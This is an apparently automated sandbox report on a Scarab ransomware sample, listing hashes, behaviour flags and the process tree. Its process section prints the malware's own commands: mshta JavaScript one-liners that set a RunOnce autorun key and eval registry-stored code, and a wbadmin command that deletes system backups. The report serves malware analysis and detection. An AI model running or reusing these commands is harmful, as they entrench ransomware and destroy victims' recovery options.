analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.zip

Full analysis: https://app.any.run/tasks/555b7475-6ed1-47de-a0c7-447e3d7c4513
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: November 08, 2018, 09:20:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
scarab
bomber
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

43DC326BF9C61B384A7DCCED11AD548E

SHA1:

2FDB61B8694E6F94D50C0ED82ACFC578CAF9F9B2

SHA256:

B63EA8D95C1693DAAED5B23723A974E7E71C46E73E95F016625DFA30BFB5EB49

SSDEEP:

6144:qGxzzz5GTnjMMRr67hCHnMSxS3X2KWfZ8OE5R7KdsUPj4G7HvamUs9RqkDlJsMIv:7zfYDjMW6lCHyFWfqOS5+eA9IkD7N3gd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 1632)
      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3464)
      • osk.exe (PID: 2056)
    • Deletes shadow copies

      • cmd.exe (PID: 3356)
      • cmd.exe (PID: 3216)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 3692)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 3272)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1444)
      • cmd.exe (PID: 2508)
      • WinRAR.exe (PID: 3668)
    • Starts CMD.EXE for commands execution

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3464)
      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 1632)
      • mshta.exe (PID: 1872)
    • Application launched itself

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 1632)
    • Starts itself from another location

      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3464)
    • Creates files in the user directory

      • cmd.exe (PID: 2508)
      • cmd.exe (PID: 1444)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • osk.exe (PID: 2056)
      • 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe (PID: 3464)
    • Creates files in the program directory

      • osk.exe (PID: 2056)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2228)
      • mshta.exe (PID: 3272)
      • mshta.exe (PID: 1872)
    • Dropped object may contain Bitcoin addresses

      • osk.exe (PID: 2056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c
ZipUncompressedSize: 684032
ZipCompressedSize: 393196
ZipCRC: 0x977c5e0b
ZipModifyDate: 2018:09:17 13:09:25
ZipCompression: Unknown (99)
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
20
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe cmd.exe 9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe no specs cmd.exe osk.exe no specs mshta.exe no specs mshta.exe mshta.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wbadmin.exe no specs wmic.exe no specs vssadmin.exe no specs bcdedit.exe no specs bcdedit.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3668"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
1632"C:\Users\admin\Desktop\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" C:\Users\admin\Desktop\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2508"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\Desktop\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" "C:\Users\admin\AppData\Roaming\osk.exe"C:\Windows\system32\cmd.exe
9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3464"C:\Users\admin\Desktop\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" runasC:\Users\admin\Desktop\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
1444"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\Desktop\9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe" "C:\Users\admin\AppData\Roaming\osk.exe"C:\Windows\system32\cmd.exe
9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2056"C:\Users\admin\AppData\Roaming\osk.exe" C:\Users\admin\AppData\Roaming\osk.exe9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Integrity Level:
HIGH
2228mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe');close()}catch(e){}},10);"C:\Windows\system32\mshta.exe9398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3272mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\MqDuTX',i);}catch(e){}},10);"C:\Windows\system32\mshta.exe
osk.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1872mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\J[QOL\\QMSEA'));close();"C:\Windows\system32\mshta.exeosk.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3016"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 820
Read events
1 060
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
1 002
Text files
390
Unknown types
60

Dropped files

PID
Process
Filename
Type
16329398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeC:\Users\admin\AppData\Local\Temp\4125696
MD5:
SHA256:
34649398fa0504fe463ec758d5ca129c7c9000720ef7199170f3ddc1fc720a8b750c.exeC:\Users\admin\AppData\Local\Temp\6969568
MD5:
SHA256:
2056osk.exeC:\Users\admin\AppData\Local\Temp\4284704
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\я
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Benioku.htm
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Berime.htm
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\IrakHau.htm
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Leame.htm
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\LeesMij.htm
MD5:
SHA256:
2056osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Leggimi.htm
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info